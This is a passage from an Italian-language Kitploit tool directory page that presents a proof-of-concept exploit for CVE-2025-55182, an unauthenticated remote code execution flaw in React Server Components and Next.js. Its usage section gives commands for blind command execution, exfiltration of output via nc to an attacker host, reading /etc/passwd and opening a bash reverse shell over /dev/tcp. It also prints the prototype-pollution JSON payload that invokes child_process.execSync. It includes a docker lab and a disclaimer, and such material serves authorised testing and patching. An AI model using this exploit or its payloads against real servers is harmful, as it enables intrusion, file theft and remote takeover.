Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182 — CVE-2025-55182 React2Shell PoC | Kitploit
Strumenti/GitHubGitHub/lowercasenumbers/cve-2025-55182
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e FormazioneStrumento di Accesso Remoto
GitHublowercasenumbers/cve-2025-55182

CVE-2025-55182

CVE-2025-55182 React2Shell PoC

Vedi Repository
9 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55182 - React2Shell PoC

Un exploit proof of concept per CVE-2025-55182, una vulnerabilità critica (CVSS 10.0) di esecuzione remota di codice non autenticata nei React Server Components.

Crediti

Scoperta da Lachlan Davidson - Divulgata al team Meta/React il 29 novembre 2025.

Panoramica della Vulnerabilità

La vulnerabilità risiede nella logica di deserializzazione del protocollo React Flight. Inviando un payload dannoso tramite HTTP POST, un attaccante può ottenere un inquinamento del prototipo (prototype pollution) che porta all'esecuzione arbitraria di codice sul server.

Versioni Affette

Scarica lo strumento
PacchettoVersioni Vulnerabili
react-server-dom-webpack19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-parcel19.0.0, 19.1.0, 19.1.1, 19.2.0
react-server-dom-turbopack19.0.0, 19.1.0, 19.1.1, 19.2.0
Next.js15.0.4, 15.1.8, 15.2.5, 15.3.5, 15.4.7, 15.5.6, 16.0.6

Framework Interessati

  • Next.js
  • React Router (con RSC)
  • Waku
  • @parcel/rsc
  • @vitejs/plugin-rsc
  • rwsdk (Redwood)

File

root@kitploit:~
.
├── exploit.py           # exploit script
├── docker-compose.yml   # Vulnerable test environment
├── vulnerable-app/      # Vulnerable Next.js application
└── README.md

Avvio Rapido

1. Avvia il Container Vulnerabile

root@kitploit:~
docker compose up -d

Questo avvia un'applicazione Next.js vulnerabile su http://localhost:3000.

2. Verifica se il Target è Vulnerabile

root@kitploit:~
python3 exploit.py -u http://localhost:3000 --check

Esegue un controllo non sfruttabile per indicatori tra cui:

  • Rilevamento del framework (Next.js, Waku, React Router, ecc.)
  • Marcatori del protocollo Flight
  • Azioni del server
  • Rilevamento della versione

3. Exploit (Esecuzione Cieca)

root@kitploit:~
python3 exploit.py -u http://localhost:3000 -c "id"

Esegue un comando senza vedere l'output. Verifica con:

4. Exploit con Esfiltrazione dell'Output

root@kitploit:~
python3 exploit.py -u http://localhost:3000 -c "id" --exfil <IP>:<PORT>

Il tuo indirizzo IP; Porta su cui ascoltare

Utilizzo

root@kitploit:~
usage: exploit.py [-h] -u URL [-c COMMAND] [--check] [--exfil HOST:PORT]
                  [--timeout TIMEOUT] [--no-verify]

options:
  -u, --url URL         Target URL
  -c, --command CMD     Command to execute
  --check               Check if vulnerable (non-exploitative)
  --exfil HOST:PORT     Exfiltrate output to HOST:PORT
  --timeout TIMEOUT     Request timeout (default: 10)
  --no-verify           Disable SSL verification

Esempi

root@kitploit:~
# Check vulnerability
python3 exploit.py -u http://localhost:3000 --check

# Blind RCE
python3 exploit.py -u http://localhost:3000 -c "touch /tmp/pwned"

# RCE with output
python3 exploit.py -u http://localhost:3000 -c "whoami" --exfil 172.17.0.1:9999

# Read files
python3 exploit.py -u http://localhost:3000 -c "cat /etc/passwd" --exfil 172.17.0.1:9999

# Reverse shell
python3 exploit.py -u http://localhost:3000 -c "bash -c 'bash -i >& /dev/tcp/172.17.0.1/4444 0>&1'"

Struttura del Payload

root@kitploit:~
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\": \"$B0\"}",
  "_response": {
    "_prefix": "process.mainModule.require('child_process').execSync('id');",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}

Esfiltrazione

L'exploit corrompe lo stato del server durante l'esecuzione, rendendo inaffidabile l'esfiltrazione della risposta in banda. Il flag --exfil utilizza l'esfiltrazione fuori banda:

root@kitploit:~
┌──────────┐  1. Malicious POST   ┌──────────┐
│ Attacker │ ──────────────────►  │  Server  │
└──────────┘                      └──────────┘
     ▲                                 │
     │  3. Command output              │ 2. RCE executes:
     │     via nc                      │    cmd | nc attacker port
     │                                 ▼
     └─────────────────────────────────┘

Pulizia

root@kitploit:~
docker compose down

Disclaimer

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e a scopi educativi. Utilizzalo solo contro sistemi per cui hai il permesso di testare.

Riferimenti

  • Avviso di sicurezza React
  • NVD - CVE-2025-55182
  • Datadog Security Labs